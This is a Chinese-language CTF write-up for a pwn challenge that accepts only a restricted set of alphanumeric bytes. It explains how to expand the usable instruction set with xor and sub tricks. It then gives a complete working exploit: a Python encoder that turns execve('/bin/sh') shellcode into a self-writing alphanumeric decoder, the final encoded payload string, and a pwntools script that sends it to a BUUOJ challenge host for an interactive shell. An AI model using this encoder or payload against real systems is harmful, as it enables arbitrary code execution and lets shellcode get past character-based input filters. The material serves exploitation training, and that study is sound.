思路
- 列出可用集,根据可用集逐步构造出全指令集
- 根据可用集逐步编码shellcode
看了别的师傅有很巧妙的做法:不直接调shell,而是先手写调read,然后输入真正的shellcode,绕过检测。
我这里主要借机学习一下shellcode编码,就按官方思路复现了。
指令集扩展
shellcode字符集
编写一个基础的shellcode:
mov rax, 0x68732f6e69622f
push rax
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
push 0x3b
pop rax
syscall
汇编并得到需要的字符集:
{0, 5, 137, 15, 47, 49, 184, 59, 72, 80, 210, 88, 98, 231, 104, 105, 106, 110, 115, 246}
原始指令集
ASCII | Hex | Assembler Instruction |
---|---|---|
1 | 0x31 | xor %{32bit}, (%{64bit}) |
5 | 0x35 | xor [dword], %eax |
a | 0x61 | Bad Instruction! |
A | 0x41 | 64 bit reserved prefix |
B | 0x42 | 64 bit reserved prefix |
C | 0x43 | 64 bit reserved prefix |
D | 0x44 | 64 bit reserved prefix |
E | 0x45 | 64 bit reserved prefix |
F | 0x46 | 64 bit reserved prefix |
G | 0x47 | 64 bit reserved prefix |
H | 0x48 | 64 bit reserved prefix |
I | 0x49 | 64 bit reserved prefix |
J | 0x4a | 64 bit reserved prefix |
K | 0x4b | 64 bit reserved prefix |
L | 0x4c | 64 bit reserved prefix |
M | 0x4d | 64 bit reserved prefix |
N | 0x4e | 64 bit reserved prefix |
O | 0x4f | 64 bit reserved prefix |
P | 0x50 | push %rax |
Q | 0x51 | push %rcx |
R | 0x52 | push %rdx |
S | 0x53 | push %rbx |
U | 0x55 | push %rbp |
V | 0x56 | push %rsi |
W | 0x57 | push %rdi |
X | 0x58 | pop %rax |
Y | 0x59 | pop %rcx |
Z | 0x5a | pop %rdx |
可用指令集很有限,但是看到数据传输指令push/pop
,数据修改指令xor %{32bit}, (%{64bit})
和xor [dword], %eax
都有,可以满足我们编码和解码的基本要求。
然后看到当前地址保存在rdx
中,而且push/pop %rdx
指令都是可用的,所以得到当前地址的数据,通过偏移计算可以得到编码后shellcode的位置。(当然这题里面没什么用,因为内存固定分配在0x10000)
因为解码需要修改内存中的数据,这里能够用于修改内存中数据的指令只有0x31
,所以我们遍历生成相关指令:
[001]: xor dword ptr [rcx], esi
[002]: xor dword ptr [rcx + 0x31], esp
[003]: xor dword ptr [rcx + 0x35], esp
[004]: xor dword ptr [rcx + 0x61], esp
[005]: xor dword ptr [rcx + 0x41], esp
[006]: xor dword ptr [rcx + 0x42], esp
[007]: xor dword ptr [rcx + 0x43], esp
[008]: xor dword ptr [rcx + 0x44], esp
[009]: xor dword ptr [rcx + 0x45], esp
[010]: xor dword ptr [rcx + 0x46], esp
[011]: xor dword ptr [rcx + 0x47], esp
[012]: xor dword ptr [rcx + 0x48], esp
[013]: xor dword ptr [rcx + 0x49], esp
[014]: xor dword ptr [rcx + 0x4a], esp
[015]: xor dword ptr [rcx + 0x4b], esp
[016]: xor dword ptr [rcx + 0x4c], esp
[017]: xor dword ptr [rcx + 0x4d], esp
[018]: xor dword ptr [rcx + 0x4e], esp
[019]: xor dword ptr [rcx + 0x4f], esp
[020]: xor dword ptr [rcx + 0x50], esp
[021]: xor dword ptr [rcx + 0x51], esp
[022]: xor dword ptr [rcx + 0x52], esp
[023]: xor dword ptr [rcx + 0x53], esp
[024]: xor dword ptr [rcx + 0x55], esp
[025]: xor dword ptr [rcx + 0x56], esp
[026]: xor dword ptr [rcx + 0x57], esp
[027]: xor dword ptr [rcx + 0x58], esp
[028]: xor dword ptr [rcx + 0x59], esp
[029]: xor dword ptr [rcx + 0x5a], esp
[030]: xor dword ptr [rcx + 0x31], eax
[031]: xor dword ptr [rcx + 0x35], eax
[032]: xor dword ptr [rcx + 0x61], eax
[033]: xor dword ptr [rcx + 0x41], eax
[034]: xor dword ptr [rcx + 0x42], eax
[035]: xor dword ptr [rcx + 0x43], eax
[036]: xor dword ptr [rcx + 0x44], eax
[037]: xor dword ptr [rcx + 0x45], eax
[038]: xor dword ptr [rcx + 0x46], eax
[039]: xor dword ptr [rcx + 0x47], eax
[040]: xor dword ptr [rcx + 0x48], eax
[041]: xor dword ptr [rcx + 0x49], eax
[042]: xor dword ptr [rcx + 0x4a], eax
[043]: xor dword ptr [rcx + 0x4b], eax
[044]: xor dword ptr [rcx + 0x4c], eax
[045]: xor dword ptr [rcx + 0x4d], eax
[046]: xor dword ptr [rcx + 0x4e], eax
[047]: xor dword ptr [rcx + 0x4f], eax
[048]: xor dword ptr [rcx + 0x50], eax
[049]: xor dword ptr [rcx + 0x51], eax
[050]: xor dword ptr [rcx + 0x52], eax
;...623 lines remains, omitted for brevity...
可以看到可用的指令还是非常多的,根据以上信息,可以选出用于读取编码后shellcode数据的寄存器,和保存地址偏移的寄存器。
这里选用rdx
保存地址偏移,eax
进行解码运算(因为eax
可以直接用立即数操作),下面是rdx
和eax
有关的指令:
[001]: xor dword ptr [rdx + 0x31], eax
[002]: xor dword ptr [rdx + 0x35], eax
[003]: xor dword ptr [rdx + 0x61], eax
[004]: xor dword ptr [rdx + 0x41], eax
[005]: xor dword ptr [rdx + 0x42], eax
[006]: xor dword ptr [rdx + 0x43], eax
[007]: xor dword ptr [rdx + 0x44], eax
[008]: xor dword ptr [rdx + 0x45], eax
[009]: xor dword ptr [rdx + 0x46], eax
[010]: xor dword ptr [rdx + 0x47], eax
[011]: xor dword ptr [rdx + 0x48], eax
[012]: xor dword ptr [rdx + 0x49], eax
[013]: xor dword ptr [rdx + 0x4a], eax
[014]: xor dword ptr [rdx + 0x4b], eax
[015]: xor dword ptr [rdx + 0x4c], eax
[016]: xor dword ptr [rdx + 0x4d], eax
[017]: xor dword ptr [rdx + 0x4e], eax
[018]: xor dword ptr [rdx + 0x4f], eax
[019]: xor dword ptr [rdx + 0x50], eax
[020]: xor dword ptr [rdx + 0x51], eax
[021]: xor dword ptr [rdx + 0x52], eax
[022]: xor dword ptr [rdx + 0x53], eax
[023]: xor dword ptr [rdx + 0x55], eax
[024]: xor dword ptr [rdx + 0x56], eax
[025]: xor dword ptr [rdx + 0x57], eax
[026]: xor dword ptr [rdx + 0x58], eax
[027]: xor dword ptr [rdx + 0x59], eax
[028]: xor dword ptr [rdx + 0x5a], eax
这里反汇编使用了capstone-engine,非常强大的反汇编框架,提供了python接口
因为这里的偏移是固定的,所以我们需要一些没用的指令填充这些空白,这里选用push/pop rcx
命令:
push %rcx
pop %rcx
异或字符集
计算一轮异或扩展到的字符集:
xor value:
{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 54, 55, 56, 57, 59, 80, 84, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 107, 108, 109, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127}
二轮异或扩展到的字符集,可以看到0x7f
以下的字符已经全部包含了:
xor2 value:
{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127}
shellcode字符集与异或字符集作差集:
{231, 137, 210, 246, 184}
这些字符要想办法二次构造了,我们在扩展到的字符集里找可以构造这些字符的指令,然后异或解码得到它们,再通过它们解码shellcode这部分字符。
全字符集
按官方WP思路我们二次构造可以用到sub/add byte ptr [rxx], xl
和一些push xxxx
。这里有点疑惑的是官方WP是怎么选出这部分指令的。
因为初步解码生成的shellcode可用0-127
的字符,而通过sub/add
我们理论就可以构造出剩下所有的字符了。
编码shellcode
上一步已经通过xor
和sub
的方式构造出了全字符集,也就是说理论上我们可以构造出任意指令使用了。接下来,有两种方式对已有shellcode进行编码:
- 直接在缓冲区中写入decoder和encoded shellcode,decoder直接对encoded shellcode进行解码。
- 编写能够在内存中写入shellcode的汇编代码。
这题我一开始尝试第一种方案,结果构造出来太长了(我太菜了555)。后面用官方思路也就是第二种思路实现。
我用rdx
寄存器来控制在内存写入的位置,rax
寄存器用于各种计算。
先使用异或字符集中可用指令构造在后面的内存中写入shellcode,这里主要选用的指令是:
push xxx
pop rax/rdx
xor dword ptr [rdx+{i*4}], eax ;用于写入shellcode
sub byte ptr [rdx+{disp}], al ;用于生成>0x7f的字符
思路如下:
- 控制rdx指向0x10500位置,也就是接下来要写入shellcode的位置
- 写入shellcode
- 对小于等于0x7f的字符通过一次或两次异或生成
- 对大于0x7f的字符通过sub生成
具体脚本如下(其实不用像我这么麻烦,这里主要是想尝试开发通用编码器所以才写的这么复杂):
# generate code <= 0x7f
generator = b""
baseaddr = 0x10300
generator += asm(f"""
push {baseaddr}
pop rdx
""")
for i in range((len(shellcode)+3)//4):
snippet = shellcode[i*4:(i+1)*4]
while len(snippet) < 4:
snippet += get_nop()
imm = 0
sub_queue = []
word = b""
for j in range(len(snippet)):
byte = snippet[j]
if byte not in generator_set:
sub_operands = get_sub_byte(byte, sub_lookup)
sub_queue.append((i*4+j, sub_operands[1]))
byte = sub_operands[0]
word += bytes([byte])
imm = unpack(word, 4*8)
generator += asm(f"""
push {imm}
pop rax
xor dword ptr [rdx+{i*4}], eax
""")
while len(sub_queue) > 0:
disp, imm = sub_queue.pop(0)
generator += asm(f"""
push {imm}
pop rax
sub byte ptr [rdx+{disp}], al
""")
# avoid side effect of \x00
generator += asm("""
push rdx
pop rax
""")
注意因为写入的汇编代码非连续,中间隔着的\x00
反汇编为add byte ptr [rax], al
,如果rax指向不可写地址,会发生段错误,因此每段代码结束都要将其指向可写地址。
这部分得到的汇编指令为:
push 0x10300
pop rdx
push 0x622f0048
pop rax
xor dword ptr [rdx], eax
push 0x45
pop rax
sub byte ptr [rdx + 1], al
push 0x732f6e69
pop rax
xor dword ptr [rdx + 4], eax
push 0x48530068
pop rax
xor dword ptr [rdx + 8], eax
push 0x31480000
pop rax
xor dword ptr [rdx + 0xc], eax
push 0x77
pop rax
sub byte ptr [rdx + 0xc], al
push 0x19
pop rax
sub byte ptr [rdx + 0xd], al
push 0x314800
pop rax
xor dword ptr [rdx + 0x10], eax
push 0xa
pop rax
sub byte ptr [rdx + 0x10], al
push 0x2e
pop rax
sub byte ptr [rdx + 0x13], al
push 0xf583b6a
pop rax
xor dword ptr [rdx + 0x14], eax
push 0x51595105
pop rax
xor dword ptr [rdx + 0x18], eax
push rdx
pop rax
接下来就是用原始指令集在内存中生成并写入这部分指令了,还是类似的思路,我一开始写了很多次都没能在0x200大小内,对比了一下是一些细节处理的马虎以及一些bug:
- 多次异或逻辑
- 偏移和内存指针变化
- 变量名字重复导致的一些bug
具体脚本如下:
decoder = b""
# get usable disps
disps = list(get_rdx_disps(alphabet))
disps.sort()
disps = disps[3:]
# initialize rdx, rax
rdx = 0x10000
rax = rdx
distance = 0x200 - disps[0]
next_info = ptr_next(rdx, distance, xor_lookup)
decoder += next_info[1]
rdx += next_info[0]
rax = rdx
baseaddr = rdx + disps[0]
# offset = baseaddr
for i in range((len(generator)+3)//4):
# baseaddr + i*4 == rdx + disp
disp = baseaddr + i*4 - rdx
if disp not in disps:
# rdx' + disp[i] = baseaddr + i*4
# rdx' = baseaddr + i*4 - disp[i]
# distance = rdx' - rdx
max_distance = baseaddr + i*4 - disps[0] - rdx
for j in range(1, len(disps)):
distance = baseaddr + i*4 - disps[j] - rdx
next_info = ptr_next(rdx, distance, xor_lookup)
if distance <= max_distance:
decoder += next_info[1]
rdx += next_info[0]
rax = rdx
disp = baseaddr + i*4 - rdx
break
snippet = generator[i*4:(i+1)*4]
word = unpack_code(snippet, 4*8)
diff = rxor(rax, word)
xor_operands = get_xor_operands(rax, word, 4*8, xor_lookup)
if not xor_operands:
xor2_operands = get_xor_operands(rax, word, 4*8, xor2_lookup)
imm = xor2_operands[0]
decoder += asm(f"xor eax, {imm}")
words = [b"", b""]
for byte in pack(xor2_operands[1], 4*8):
byte_operands = get_xor_byte(byte, xor_lookup)
words[0] += bytes([byte_operands[0]])
words[1] += bytes([byte_operands[1]])
for word in words:
imm = unpack(word, 4*8)
decoder += asm(f"xor eax, {imm}")
else:
for operand in xor_operands:
imm = operand
decoder += asm(f"xor eax, {imm}")
decoder += asm(f"xor dword ptr [rdx+{disp}], eax")
rax ^= diff
# avoid side effect of \x00
distance = 0x10000 - rdx
next_info = ptr_next(rdx, distance, xor_lookup)
decoder += next_info[1]
编码生成结果,汇编后长度为0x1e0:
push rdx
pop rax
xor eax, 0x31314131
xor eax, 0x31314331
push rax
pop rdx
xor eax, 0x42414131
xor eax, 0x43434359
xor dword ptr [rdx + 0x42], eax
xor eax, 0x31413141
xor eax, 0x314b3148
xor eax, 0x49615a61
xor dword ptr [rdx + 0x46], eax
xor eax, 0x41413131
xor eax, 0x514b4431
xor dword ptr [rdx + 0x4a], eax
xor eax, 0x44414c50
xor eax, 0x59496161
xor dword ptr [rdx + 0x4e], eax
xor eax, 0x31313141
xor eax, 0x31414149
xor eax, 0x44585a61
xor dword ptr [rdx + 0x52], eax
xor eax, 0x31313131
xor eax, 0x45443142
xor eax, 0x5a594143
xor dword ptr [rdx + 0x56], eax
xor eax, 0x41413131
xor eax, 0x4d44314b
xor eax, 0x615a3161
xor dword ptr [rdx + 0x5a], eax
push rdx
pop rax
xor eax, 0x31313141
xor eax, 0x3131315a
push rax
pop rdx
xor eax, 0x31414131
xor eax, 0x50494a4f
xor eax, 0x61616161
xor dword ptr [rdx + 0x43], eax
xor eax, 0x31313131
xor eax, 0x31424131
xor eax, 0x31435057
xor dword ptr [rdx + 0x47], eax
xor eax, 0x31313131
xor eax, 0x31423541
xor eax, 0x31434461
xor dword ptr [rdx + 0x4b], eax
xor eax, 0x31313131
xor eax, 0x31313531
xor eax, 0x58594442
xor dword ptr [rdx + 0x4f], eax
xor eax, 0x31313131
xor eax, 0x41415a31
xor eax, 0x424d6131
xor dword ptr [rdx + 0x53], eax
xor eax, 0x31313131
xor eax, 0x41424a31
xor eax, 0x58576146
xor dword ptr [rdx + 0x57], eax
push rdx
pop rax
xor eax, 0x31313149
xor eax, 0x31313161
push rax
pop rdx
xor eax, 0x31314131
xor eax, 0x31484841
xor eax, 0x5861614f
xor dword ptr [rdx + 0x43], eax
xor eax, 0x51414945
xor eax, 0x61556161
xor dword ptr [rdx + 0x47], eax
xor eax, 0x41313131
xor eax, 0x48415a41
xor eax, 0x614c6158
xor dword ptr [rdx + 0x4b], eax
xor eax, 0x35414131
xor eax, 0x44535931
xor eax, 0x61616158
xor dword ptr [rdx + 0x4f], eax
xor eax, 0x59425a53
xor eax, 0x61586161
xor dword ptr [rdx + 0x53], eax
xor eax, 0x41534249
xor eax, 0x47615861
xor dword ptr [rdx + 0x57], eax
push rdx
pop rax
xor eax, 0x31313131
xor eax, 0x31313149
push rax
pop rdx
xor eax, 0x31313131
xor eax, 0x43314143
xor eax, 0x61435a61
xor dword ptr [rdx + 0x43], eax
xor eax, 0x31413131
xor eax, 0x31593142
xor eax, 0x4b614243
xor dword ptr [rdx + 0x47], eax
xor eax, 0x42415331
xor eax, 0x584b6156
xor dword ptr [rdx + 0x4b], eax
xor eax, 0x41555141
xor eax, 0x5261615a
xor dword ptr [rdx + 0x4f], eax
xor eax, 0x42313131
xor eax, 0x43354131
xor eax, 0x6159494d
xor dword ptr [rdx + 0x53], eax
xor eax, 0x41313131
xor eax, 0x495a314b
xor eax, 0x61614961
xor dword ptr [rdx + 0x57], eax
push rdx
pop rax
xor eax, 0x31314131
xor eax, 0x31314361
push rax
pop rdx
最后剩下的填充nop指令到0x200即可,最后的payload如下:
RX51A1151C11PZ51AAB5YCCC1BB5A1A15H1K15aZaI1BF511AA51DKQ1BJ5PLAD5aaIY1BN5A1115IAA15aZXD1BR511115B1DE5CAYZ1BV511AA5K1DM5a1Za1BZRX5A1115Z111PZ51AA15OJIP5aaaa1BC5111151AB15WPC11BG511115A5B15aDC11BK51111515115BDYX1BO5111151ZAA51aMB1BS5111151JBA5FaWX1BWRX5I1115a111PZ51A115AHH15OaaX1BC5EIAQ5aaUa1BG5111A5AZAH5XaLa1BK51AA551YSD5Xaaa1BO5SZBY5aaXa1BS5IBSA5aXaG1BWRX511115I111PZ511115CA1C5aZCa1BC511A15B1Y15CBaK1BG51SAB5VaKX1BK5AQUA5ZaaR1BO5111B51A5C5MIYa1BS5111A5K1ZI5aIaa1BWRX51A115aC11PZYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQ
Exp
from pwn import *
from capstone import *
from capstone import x86
from keystone import *
debug = False
local_path = './pwn_1'
remote_path = 'node4.buuoj.cn'
remote_port = 29298
file = ELF(local_path)
libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')
# libc = file.libc
# ld = ELF('/usr/lib/x86_64-linux-gnu/ld-2.31.so')
context.binary = local_path
if debug:
io = process(local_path)
# context.terminal = ['cmd.exe', '/c', 'wt.exe', '-w', '0','sp', '-V', '--title', 'gdb', 'bash', '-c']
# context.terminal = ['cmd.exe', '/c', 'wt.exe', 'bash', '-c']
context.log_level = 'debug'
else:
io = remote(remote_path, remote_port)
def z(a=''):
if debug:
gdb.attach(io, a)
if a == '':
raw_input()
else:
pass
def asm(code):
ks = Ks(KS_ARCH_X86, KS_MODE_64)
encoding, count = ks.asm(code)
return bytes(encoding)
def disasm(code):
md = Cs(CS_ARCH_X86, CS_MODE_64)
md.detail = True
return md.disasm(code, 0x0)
def rxor(src, dest):
return src ^ dest
def unpack_code(code, word_size):
nop_count = word_size//8 - len(code)
for i in range(nop_count):
code += get_nop()
return unpack(code, word_size)
def get_xor_lookup(alphabet1, alphabet2=None):
if alphabet2 is None:
alphabet2 = alphabet1
lookup = dict()
for i in alphabet1:
for j in alphabet2:
k = i ^ j
if lookup.get(k):
continue
else:
lookup[k] = (i, j)
return lookup
def get_xor_byte(byte, lookup):
return lookup.get(byte)
def get_xor_operands(src, dest, word_size, lookup):
diff = rxor(src, dest)
operands = [b"", b""]
for byte in pack(diff, word_size):
byte_operands = get_xor_byte(byte, lookup)
if not byte_operands:
return None
operands[0] += bytes([byte_operands[0]])
operands[1] += bytes([byte_operands[1]])
return tuple([unpack(operand, word_size) for operand in operands])
def get_sub_lookup(alphabet):
lookup = dict()
for i in alphabet:
for j in alphabet:
k = (i - j) % 256
if lookup.get(k):
continue
else:
lookup[k] = (i, j)
return lookup
def get_sub_byte(byte, lookup):
return lookup.get(byte)
pair_flag = False
def get_nop():
global pair_flag
pair_flag = not pair_flag
inst = 'push rcx' if pair_flag else 'pop rcx'
return asm(inst)
def get_rdx_disps(alphabet):
disps = set()
for operand1 in alphabet:
for operand2 in alphabet:
code = bytes([0x31, operand1, operand2])
for inst in disasm(code):
if inst.mnemonic == 'xor':
if inst.operands[0].mem.disp not in disps:
if inst.reg_name(inst.operands[0].mem.base) == 'rdx' and inst.reg_name(inst.operands[1].value.reg) == 'eax':
disps.add(inst.operands[0].mem.disp)
# print("[%03d]:\t%s\t%s" %
# (len(disps), inst.mnemonic, inst.op_str))
return disps
def ptr_next(ptr, distance, lookup):
src = ptr
dest = ptr + distance
operands = get_xor_operands(src, dest, 4*8, lookup)
while not operands:
distance += 1
dest = ptr + distance
operands = get_xor_operands(src, dest, 4*8, lookup)
code = f"""
push rdx
pop rax
xor eax, {operands[0]}
xor eax, {operands[1]}
push rax
pop rdx
"""
return (distance, asm(code))
def encode(shellcode: str, alphabet: set):
shellcode = asm(shellcode)
# initialize lookup table
xor_lookup = get_xor_lookup(alphabet)
xor2_lookup = get_xor_lookup(alphabet, xor_lookup)
generator_set = alphabet | set(xor_lookup) | set(xor2_lookup)
sub_lookup = get_sub_lookup(generator_set)
# generate code <= 0x7f
generator = b""
baseaddr = 0x10300
generator += asm(f"""
push {baseaddr}
pop rdx
""")
for i in range((len(shellcode)+3)//4):
snippet = shellcode[i*4:(i+1)*4]
while len(snippet) < 4:
snippet += get_nop()
imm = 0
sub_queue = []
word = b""
for j in range(len(snippet)):
byte = snippet[j]
if byte not in generator_set:
sub_operands = get_sub_byte(byte, sub_lookup)
sub_queue.append((i*4+j, sub_operands[1]))
byte = sub_operands[0]
word += bytes([byte])
imm = unpack(word, 4*8)
generator += asm(f"""
push {imm}
pop rax
xor dword ptr [rdx+{i*4}], eax
""")
while len(sub_queue) > 0:
disp, imm = sub_queue.pop(0)
generator += asm(f"""
push {imm}
pop rax
sub byte ptr [rdx+{disp}], al
""")
# avoid side effect of \x00
generator += asm("""
push rdx
pop rax
""")
# for inst in disasm(generator):
# print("%s\t%s" % (inst.mnemonic, inst.op_str))
decoder = b""
# get usable disps
disps = list(get_rdx_disps(alphabet))
disps.sort()
disps = disps[3:]
# initialize rdx, rax
rdx = 0x10000
rax = rdx
distance = 0x200 - disps[0]
next_info = ptr_next(rdx, distance, xor_lookup)
decoder += next_info[1]
rdx += next_info[0]
rax = rdx
baseaddr = rdx + disps[0]
# offset = baseaddr
for i in range((len(generator)+3)//4):
# baseaddr + i*4 == rdx + disp
disp = baseaddr + i*4 - rdx
if disp not in disps:
# rdx' + disp[i] = baseaddr + i*4
# rdx' = baseaddr + i*4 - disp[i]
# distance = rdx' - rdx
max_distance = baseaddr + i*4 - disps[0] - rdx
for j in range(1, len(disps)):
distance = baseaddr + i*4 - disps[j] - rdx
next_info = ptr_next(rdx, distance, xor_lookup)
if distance <= max_distance:
decoder += next_info[1]
rdx += next_info[0]
rax = rdx
disp = baseaddr + i*4 - rdx
break
snippet = generator[i*4:(i+1)*4]
word = unpack_code(snippet, 4*8)
diff = rxor(rax, word)
xor_operands = get_xor_operands(rax, word, 4*8, xor_lookup)
if not xor_operands:
xor2_operands = get_xor_operands(rax, word, 4*8, xor2_lookup)
imm = xor2_operands[0]
decoder += asm(f"xor eax, {imm}")
words = [b"", b""]
for byte in pack(xor2_operands[1], 4*8):
byte_operands = get_xor_byte(byte, xor_lookup)
words[0] += bytes([byte_operands[0]])
words[1] += bytes([byte_operands[1]])
for word in words:
imm = unpack(word, 4*8)
decoder += asm(f"xor eax, {imm}")
else:
for operand in xor_operands:
imm = operand
decoder += asm(f"xor eax, {imm}")
decoder += asm(f"xor dword ptr [rdx+{disp}], eax")
rax ^= diff
# avoid side effect of \x00
distance = 0x10000 - rdx
next_info = ptr_next(rdx, distance, xor_lookup)
decoder += next_info[1]
return decoder
def exp():
alphabet = set(b'15aABCDEFGHIJKLMNOPQRSUVWXYZ')
shellcode = """
mov rbx, 0x68732f6e69622f
push rbx
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
push 0x3b
pop rax
syscall
"""
shellcode = encode(shellcode, alphabet)
while len(shellcode) < 0x200:
shellcode += get_nop()
# z()
# print(shellcode)
io.send(shellcode)
io.interactive()
if __name__ == '__main__':
exp()
总结
- 通过可用指令集的修改数据指令扩展到更大的指令集
- 选择合适的寄存器,选择合适的指令
- 内存中的
\x00
反汇编为add byte ptr [rax], al
,如果rax指向不可写地址,会发生段错误 - 通用编码器的实现思路
- 模拟汇编环境
- 跟踪寄存器变量等
- 映射各指令和字符集
- 汇编指令对应到基本运算,并求逆运算
- 选择合适编码模型
- 解码器+编码后指令(通用性强)
- 分层指令解码(灵活性强)
- 模拟汇编环境